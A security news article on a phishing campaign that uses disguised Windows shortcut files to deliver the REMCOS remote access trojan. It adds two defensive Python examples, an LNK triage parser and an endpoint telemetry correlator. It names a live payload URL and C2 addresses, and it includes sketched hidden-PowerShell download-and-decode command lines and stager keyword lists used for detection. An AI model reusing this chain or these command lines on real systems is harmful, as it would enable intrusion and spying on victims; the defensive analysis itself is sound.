Cybercriminals continue to find clever ways to bypass antivirus solutions and endpoint defenses. A recent Point Wild analysis has shed light on a stealthy multi-stage malware campaign that leverages the deceptive simplicity of a Windows shortcut file—.lnk—to deploy the REMCOS backdoor, a powerful remote access trojan (RAT) known for full-system control capabilities.
“A common way hackers carry out fileless attacks is by using malicious Windows Shortcut (LNK) files. These shortcuts are disguised to look harmless, like a document, folder, or disk drive,” the report explains.
The attack begins with social engineering—typically a phishing email disguised as an invoice or document. Once the victim clicks the malicious LNK file, the damage unfolds in three silent stages:

- Execution of PowerShell: The LNK invokes Windows PowerShell, which quietly downloads a disguised file (HEW.GIF) from https://shipping-hr.ro/m/r/r.txt.
- Base64 Decoding: HEW.GIF is a Base64-encoded payload, which PowerShell decodes into an executable: CHROME.PIF.
- Payload Launch: “start C:\ProgramData\CHROME.PIF launches the malicious payload… which is a PE image-based MS-DOS program containing the REMCOS RAT.”
Unlike macro-bearing Office documents, LNK files trigger no macro warning, so execution proceeds without raising the user's suspicion.
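As an added example (not code from the article or the Point Wild report), the following Python parses the StringData section of a Shell Link file and triages it for the traits described above: an interpreter as the target, download or Base64-decoding cmdlets in the arguments, a hidden window, a second-stage file such as a .PIF, and a document icon on a shortcut that really launches an interpreter. The two sample shortcuts are constructed with the included writer; the lure's URL is a placeholder and its command line is a deliberately non-functional sketch of the three stages. Skipping the LinkTargetIDList and LinkInfo structures is a simplification of the format, noted in the code.

```python
import re
import struct

# Shell Link (.LNK) header LinkFlags bits this parser relies on (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections, in the fixed order the format stores them, with their flag bits.
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}


def parse_lnk(blob: bytes) -> dict:
    """Return the StringData fields of a .LNK file. LinkTargetIDList and LinkInfo
    (where the absolute target path lives) are skipped, not decoded, so triage
    keys on the relative path, working directory and command-line arguments."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", blob, 0)
    if header_size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    off = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:        # uint16 IDListSize, then the IDList
        off += 2 + struct.unpack_from("<H", blob, off)[0]
    if flags & HAS_LINK_INFO:                  # uint32 LinkInfoSize includes itself
        off += struct.unpack_from("<I", blob, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, off)[0]   # CountCharacters, not bytes
        off += 2
        raw = blob[off:off + (count * 2 if unicode else count)]
        off += len(raw)
        fields[key] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32")
STAGERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
           "frombase64string", "-encodedcommand", "http://", "https://")
ICON_DISGUISES = ("winword", "excel", "acrord", "imageres.dll", "shell32.dll")
R_INTERP = "relative path or arguments name a script interpreter or command shell"
R_STAGER = "arguments fetch remote content or Base64-decode data"
R_HIDDEN = "arguments request a hidden window"
R_DROPPER = "arguments reference a second-stage .pif/.scr/.bat/.vbs/.hta file"
R_ICON = "icon mimics a document or folder while the target is an interpreter"


def triage_lnk(blob: bytes) -> list:
    """Flag the traits the report describes; returns an empty list for a clean shortcut."""
    f = parse_lnk(blob)
    text = " ".join(f.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    is_interp = any(i in text for i in INTERPRETERS)
    reasons = [R_INTERP] if is_interp else []
    if any(s in text for s in STAGERS):
        reasons.append(R_STAGER)
    if re.search(r"-w(?:indowstyle)?\s+h(?:id(?:den)?)?\b", text):
        reasons.append(R_HIDDEN)
    if re.search(r"\.(?:pif|scr|bat|vbs|hta)\b", text):
        reasons.append(R_DROPPER)
    if is_interp and any(d in f.get("icon_location", "").lower() for d in ICON_DISGUISES):
        reasons.append(R_ICON)
    return reasons


def build_lnk(**strings) -> bytes:
    """Constructed-sample writer: 76-byte header plus Unicode StringData, no IDList/LinkInfo."""
    flags, body = IS_UNICODE, b""
    for bit, key in STRING_FIELDS:
        value = strings.get(key, "")
        if value:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + body


# Constructed samples, not the campaign's file. The lure sketches the chain above
# (hidden PowerShell, download, Base64 decode, a .PIF started from ProgramData);
# the URL is a placeholder and the command is deliberately not runnable.
LURE_LNK = build_lnk(
    name="Invoice_2024.pdf",
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments='-WindowStyle Hidden -NoProfile -Command "Invoke-WebRequest https://PLACEHOLDER.example/r.txt ...; '
              '[Convert]::FromBase64String(...); Start-Process C:\\ProgramData\\CHROME.PIF"',
    icon_location=r"%ProgramFiles%\Adobe\Acrobat\AcroRd32.exe",
)
BENIGN_LNK = build_lnk(name="Notepad", relative_path=r"..\..\Windows\System32\notepad.exe",
                       icon_location=r"%SystemRoot%\System32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, "->", triage_lnk(blob) or ["no findings"])
```

Run it against shortcuts pulled from mail attachments or archive contents before a user ever double-clicks them; a mature tool such as LECmd also decodes the IDList and LinkInfo, which this parser skips, so a shortcut whose only interesting string is its absolute target path would slip past the `R_INTERP` check here.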
REMCOS is a backdoor written in C++ that communicates via a custom TCP protocol. It enables:
- Remote shell command execution
- File upload/download
- Keystroke logging
- Webcam and microphone hijacking
- Screenshot capturing
The malware uses SetWindowsHookExA (from user32.dll) to intercept keystrokes and stores logs in %ProgramData%\remcos\logs.dat.
“A log file is stored in the %ProgramData% directory, where a folder named ‘remcos’ is created… to capture and store all system logging activities and keystrokes,” the report explains.
The malware establishes encrypted command-and-control (C2) communication with:
- 92.82.184.33 — Romania (Telekom Romania, AS9050)
- 198.23.251.10 — United States
The domain shipping-hr.ro resolves to the Romanian IP, delivering the malicious payload via TLS 1.2.
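Added example, not part of the article or the Point Wild report: a small correlator that maps constructed endpoint telemetry (process, file and network events in a Sysmon-like shape) onto the stages described above and raises a per-host verdict. The indicators come from the report (the two C2 addresses, the shipping-hr.ro domain, the CHROME.PIF path under ProgramData and the remcos\logs.dat keylog file); the event field names, the host names, the timestamps and the 15-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Indicators taken from the report above; the telemetry events further down are constructed.
C2_IPS = {"92.82.184.33", "198.23.251.10"}
C2_DOMAINS = {"shipping-hr.ro"}
STAGER_HINTS = ("http://", "https://", "downloadstring", "downloadfile",
                "invoke-webrequest", "frombase64string", "-encodedcommand", "-enc ")
WINDOW = timedelta(minutes=15)   # assumed: all stages land on one host within this span


def stage_of(ev: dict):
    """Map a single telemetry event to one stage of the described chain, or None."""
    kind = ev["type"]
    if kind == "process":
        image, cmd = ev["image"].lower(), ev.get("cmdline", "").lower()
        if image.endswith("powershell.exe") and any(h in cmd for h in STAGER_HINTS):
            return "stage1_powershell_download"
        if image.startswith(r"c:\programdata") and image.endswith(".pif"):
            return "stage3_pif_launched"
    elif kind == "file":
        path = ev["path"].lower()
        if path.startswith(r"c:\programdata") and path.endswith(".pif"):
            return "stage2_pif_written"
        if path.endswith(r"\remcos\logs.dat"):
            return "post_keylog_file"
    elif kind == "network":
        if ev.get("dest_ip") in C2_IPS or ev.get("dest_host", "").lower() in C2_DOMAINS:
            return "post_c2_contact"
    return None


def correlate(events, window=WINDOW) -> dict:
    """Group stage hits per host inside a window anchored at the host's first hit.
    A hit outside the window starts a new window (older stages are dropped)."""
    findings = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage is None:
            continue
        f = findings.setdefault(ev["host"], {"first": ev["ts"], "stages": []})
        if ev["ts"] - f["first"] > window:
            f["first"], f["stages"] = ev["ts"], []
        if stage not in f["stages"]:
            f["stages"].append(stage)
    for f in findings.values():
        chain_hits = sum(s.startswith("stage") for s in f["stages"])
        # C2 contact alone is decisive; otherwise require two of the three execution stages.
        f["verdict"] = ("likely REMCOS chain" if "post_c2_contact" in f["stages"] or chain_hits >= 2
                        else "single weak indicator")
    return findings


T0 = datetime(2025, 1, 1, 9, 0, 0)   # constructed timestamp
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed, Sysmon-like events; WS-01 shows the full chain
    {"ts": T0, "host": "WS-01", "type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "... https://shipping-hr.ro/m/r/r.txt ..."'},
    {"ts": T0 + timedelta(seconds=2), "host": "WS-01", "type": "network",
     "dest_host": "shipping-hr.ro", "dest_ip": "92.82.184.33"},
    {"ts": T0 + timedelta(seconds=5), "host": "WS-01", "type": "file", "path": r"C:\ProgramData\CHROME.PIF"},
    {"ts": T0 + timedelta(seconds=6), "host": "WS-01", "type": "process",
     "image": r"C:\ProgramData\CHROME.PIF", "parent": PS},
    {"ts": T0 + timedelta(seconds=9), "host": "WS-01", "type": "file", "path": r"C:\ProgramData\remcos\logs.dat"},
    {"ts": T0 + timedelta(seconds=12), "host": "WS-01", "type": "network", "dest_ip": "198.23.251.10"},
    # WS-02: an administrator running a local script; no download, no indicators
    {"ts": T0 + timedelta(minutes=1), "host": "WS-02", "type": "process", "image": PS,
     "parent": r"C:\Windows\explorer.exe", "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    # WS-03: only an outbound connection to a listed C2 address
    {"ts": T0 + timedelta(minutes=2), "host": "WS-03", "type": "network", "dest_ip": "198.23.251.10"},
]

if __name__ == "__main__":
    for host, f in correlate(EVENTS).items():
        print(host, f["verdict"], f["stages"])
```

The behavioural stages (PowerShell with a download hint, a .PIF written to and then executed from ProgramData, the remcos\logs.dat artifact) are the durable part of this rule; the two IP addresses and the domain will rotate, so treat them as a short-lived bonus signal rather than the core of the detection.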
Organizations and users must maintain vigilance, especially with file types like .lnk, .pif, and hidden attachments in archives.